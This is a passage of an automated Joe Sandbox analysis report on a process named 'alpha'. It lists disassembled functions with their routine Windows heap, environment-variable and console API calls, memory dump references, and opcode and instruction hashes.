                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                        • String ID: %s=%s$DPATH$PATH
                                        • API String ID: 3731854180-3148396303
                                        • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                        • Instruction ID: 0c634b2a07d0842a9beb0e12c8ec306ea5b35549c1795a4e1465f4671017d59c
                                        • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                        • Instruction Fuzzy Hash: 05218025B0DA5290EE54AF95E440679E3A5AF84BA4FC88135CF2E47395FF3CD6408760
                                        Function 00007FF7CD486A48 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD493C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7CD493D0C
                                          • Part of subcall function 00007FF7CD493C24: towupper.MSVCRT ref: 00007FF7CD493D2F
                                          • Part of subcall function 00007FF7CD493C24: iswalpha.MSVCRT ref: 00007FF7CD493D4F
                                          • Part of subcall function 00007FF7CD493C24: towupper.MSVCRT ref: 00007FF7CD493D75
                                          • Part of subcall function 00007FF7CD493C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD493DBF
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925,?,?,?,?,00007FF7CD48B9B1), ref: 00007FF7CD486ABF
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD486AD3
                                          • Part of subcall function 00007FF7CD486B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7CD486AE8,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B8B
                                          • Part of subcall function 00007FF7CD486B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7CD486AE8,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B97
                                          • Part of subcall function 00007FF7CD486B84: RtlFreeHeap.NTDLL ref: 00007FF7CD486BAF
                                          • Part of subcall function 00007FF7CD486B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD486AF1,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B39
                                          • Part of subcall function 00007FF7CD486B30: RtlFreeHeap.NTDLL ref: 00007FF7CD486B4D
                                          • Part of subcall function 00007FF7CD486B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD486AF1,?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925), ref: 00007FF7CD486B59
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD4AEA0F,?,?,?,00007FF7CD4AE925,?,?,?,?,00007FF7CD48B9B1), ref: 00007FF7CD486B03
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD486B17
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                        • String ID:
                                        • API String ID: 3512109576-0
                                        • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                        • Instruction ID: 7fe8b07715b12a3b8351a958f3a9b0fb77b3244cf8d78721bf89ea32230b32a1
                                        • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                        • Instruction Fuzzy Hash: 94216061B0DA8286EB44AF6698142B8BBA1EB59B54F948035CF2E47355EE2C9546C320
                                        Function 00007FF7CD48B6B0 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B6D0
                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B6E7
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B701
                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48AF82), ref: 00007FF7CD48B715
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Process$AllocSize
                                        • String ID:
                                        • API String ID: 2549470565-0
                                        • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                        • Instruction ID: a3f1c9c1b5cbb9d0eebe271c596b3d5fa62c19b627716f346d4fd7b9c8465a63
                                        • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                        • Instruction Fuzzy Hash: 4221EE25B0DB4296EE14AF55E444078FAA1FB89B90BC89431DF2E43754EF3CE645C720
                                        Function 00007FF7CD4A5690 Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7CD4A5433,?,?,?,00007FF7CD4A69B8,?,?,?,?,?,00007FF7CD498C39), ref: 00007FF7CD4A56C5
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A56D9
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7CD4A5433,?,?,?,00007FF7CD4A69B8,?,?,?,?,?,00007FF7CD498C39), ref: 00007FF7CD4A56FD
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A5711
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess
                                        • String ID:
                                        • API String ID: 3859560861-0
                                        • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                        • Instruction ID: af4b323460223be10d2c26af31a9af36ccaed972897ebd0604b1af1e724792bf
                                        • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                        • Instruction Fuzzy Hash: B9113672A08B81D6EB009F56E4040ACBBB1FB9DF94B888125DF5E03718EF38E556C750
                                        Function 00007FF7CD499158 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                        • String ID:
                                        • API String ID: 140117192-0
                                        • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                        • Instruction ID: 0e03c8e30732d54e189a89c105357eb63b0b6d5c57af0e31462d7a81c71f7175
                                        • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                        • Instruction Fuzzy Hash: D4210435A0CF81A1E648AF45E8803A9B3A4FB98764F9000B5DF9E02764EF3DE244C720
                                        Function 00007FF7CD494AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AD6
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD494AEF
                                          • Part of subcall function 00007FF7CD494A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A28
                                          • Part of subcall function 00007FF7CD494A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A66
                                          • Part of subcall function 00007FF7CD494A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A7D
                                          • Part of subcall function 00007FF7CD494A14: memmove.MSVCRT(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494A9A
                                          • Part of subcall function 00007FF7CD494A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7CD4949F1), ref: 00007FF7CD494AA2
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD488798), ref: 00007FF7CD49EE64
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD49EE78
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                        • String ID:
                                        • API String ID: 2759988882-0
                                        • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                        • Instruction ID: 6d20212b7ae7292d5a836c2b3755dee44da18ecd182ecb8080b9a28457865297
                                        • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                        • Instruction Fuzzy Hash: ECF0EC61B1DA4296EF14AFA69418578F9D2EF8EB61B88D434CE1E42350FE3CA6458720
                                        Function 00007FF7CD4AF22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleMode_get_osfhandle
                                        • String ID:
                                        • API String ID: 1606018815-0
                                        • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                        • Instruction ID: c5326dbcd0ed2341e9425964785f693da3a06a48f324f9f361c8b445caa782d6
                                        • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                        • Instruction Fuzzy Hash: FBF01232628A41DBD7446F51E444179FA61FB9AB12FC49234DF1F02394EF3CD1048B50
                                        Function 00007FF7CD48CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleTitle
                                        • String ID: -
                                        • API String ID: 3358957663-3695764949
                                        • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                        • Instruction ID: c748e467075e0743f98b9e45d38919dffa59fb2bfa209dcdc71d09afd0d8500f
                                        • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                        • Instruction Fuzzy Hash: E7316F21B0CA4286EA14BF12A804478EAA5BB89BF0F944135DF2E577D5FF3CE651C324
                                        Function 00007FF7CD497280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsnicmpswscanf
                                        • String ID: :EOF
                                        • API String ID: 1534968528-551370653
                                        • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                        • Instruction ID: e3983b0b46e150881e6b875a5e69506901cf1ef8294e1c2d5c2dc7b24bad2592
                                        • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                        • Instruction Fuzzy Hash: 5B318E31B0CA4286EB64BF56B8406B8F6A6EF54B60FD44031DF6D46291FF2CEA41C760
                                        Function 00007FF7CD48B62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 3$3
                                        • API String ID: 0-2538865259
                                        • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                        • Instruction ID: d01a1294a90a065e0ce05ce44228ea3a66c0576e4ddf5f2f6594be908194d599
                                        • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                        • Instruction Fuzzy Hash: 49012331F0E5828AF354AF629884278FA60BB903B1FD84135CE2E815E1FF2D6685C761
                                        Function 00007FF7CD4906C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906D6
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906F0
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD49074D
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD490762
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcess
                                        • String ID:
                                        • API String ID: 1617791916-0
                                        • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                        • Instruction ID: 978296a0645cc9082028aae0f707cabe213949a83b6708db2184f0fb3dfc7a9d
                                        • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                        • Instruction Fuzzy Hash: 8A416832B0D64286EA14AF12E444579FBA6EF85BA1BC88034DF6E03750EF3DE641C760